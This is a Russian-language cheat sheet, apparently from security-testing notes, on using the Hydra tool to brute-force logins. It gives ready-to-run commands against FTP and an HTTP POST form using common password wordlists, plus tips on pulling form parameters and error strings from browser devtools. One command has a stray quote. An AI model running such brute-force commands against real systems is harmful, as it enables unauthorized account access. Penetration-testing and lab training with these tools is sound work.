Перейти к содержанию

Hydra

Online cracking tool способная быстро перебирать credentinals для различных протоколов прикладного уровня.

В общем случае вызывается следующей командой: 

hydra -l username -P wordlist.txt server service

Примеры использования:

Брутфорс определенного протокола
hydra -vV -t 16 -l USERNAME \
-P /usr/share/wordlists/rockyou.txt \
-vV $TARGET_IP $PROTO"
FTP Server
hydra -l FTPuser -P /usr/share/wordlists/rockyou.txt 10.10.10.10 ftp

или

hydra -l FTPuser -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.10
Брутфорс http POST формы

hydra -vV -e nsr \
-L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
-P /usr/share/seclists/Passwords/2020-200_most_used_passwords.txt \
10.10.125.121 http-post-form \
"/js/login.js:username=^USER^&password=^PASS^:Incorrect Credentials"
Описание параметров и откуда их взять:

/js/login.js - скрипт который непосредственно отвечает за авторизацию.

Открыть devtools, посмотреть stack trace во вкладке network.

username=^USER^&password=^PASS^ - ^USER^, ^PASS^ для подстановки значений из списков.

Cтроку взять из вкладки network->request в raw формате.

Incorrect Credentials - строка сообщения об ошибке.